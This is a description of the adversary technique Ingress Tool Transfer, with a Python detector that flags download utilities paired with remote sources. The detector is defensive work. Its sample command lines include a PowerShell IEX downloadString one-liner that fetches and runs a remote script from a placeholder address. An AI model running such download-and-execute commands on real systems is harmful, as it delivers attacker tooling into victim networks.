Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp. Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer).
Files can also be transferred using various Web Services as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016)
On Windows, adversaries may use various utilities to download tools, such as `copy`, `finger`, and PowerShell commands such as `IEX(New-Object Net.WebClient).downloadString()` and `Invoke-WebRequest`. On Linux and macOS systems, a variety of utilities also exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.(Citation: t1105_lolbas)
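A detection heuristic for the utilities named above, run over process command lines. This is an added example, not part of the original technique description: the rule names, regular expressions and sample command lines are constructed assumptions. A utility is flagged only when the command line also names a remote source, and for `scp` and `rsync` only when the remote side is the source rather than the destination.

```python
import re

URL = r"(?:https?|ftp)://[^\s'\"]+"
UNC = r"\\\\[\w.$-]+\\\S+"                          # \\host\share\file
REMOTE = r"(?:[\w.-]+@[\w.-]+|[\w.-]{2,}:[^\s\\])"  # user@host or host:path, not C:\
REMOTE_SRC = REMOTE + r"\S*\s+\S"                   # remote spec is not the last argument

def _tool(name):
    # Utility name at a command boundary, with an optional .exe suffix.
    return r"(?:^|[\s\\/;|&(])" + re.escape(name) + r"(?:\.exe)?(?=\s|$)"

# (rule name, pattern for the utility, pattern for a remote source)
RULES = [(n, re.compile(t, re.I), re.compile(g, re.I)) for n, t, g in [
    ("powershell-downloadstring", r"net\.webclient\)?\.downloadstring", URL),
    ("invoke-webrequest", _tool("Invoke-WebRequest"), URL),
    ("curl", _tool("curl"), URL),
    ("wget", _tool("wget"), URL),
    ("copy", _tool("copy"), UNC),
    ("finger", _tool("finger"), r"@[\w.-]+"),
    ("tftp", _tool("tftp"), r"\bget\b"),
    ("scp", _tool("scp"), REMOTE_SRC),
    ("rsync", _tool("rsync"), REMOTE_SRC),
    ("sftp", _tool("sftp"), REMOTE),
]]

def match_ingress(cmdline):
    """Return the first rule whose utility and remote source both appear, else None."""
    for name, tool, target in RULES:
        if tool.search(cmdline) and target.search(cmdline):
            return name
    return None

# Constructed sample command lines (documentation address ranges and hostnames).
SAMPLES = [
    "powershell -nop -c \"IEX(New-Object Net.WebClient).downloadString('http://198.51.100.7/a.ps1')\"",
    r"cmd /c copy \\fileserver\share\tool.exe C:\Windows\Temp",
    "scp ops@203.0.113.9:/srv/tool ./tool",
    "scp ./archive.tgz ops@203.0.113.9:/srv/",   # upload: remote side is the destination
    "curl --version",                            # utility present, no remote source
    "copy report.docx report.bak",               # local copy only
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(f"{match_ingress(line) or '-':28} {line}")
```

Matching is on command-line text only, so scheme-less `curl` targets and single-letter hostnames are missed, and aliased or renamed binaries need separate coverage.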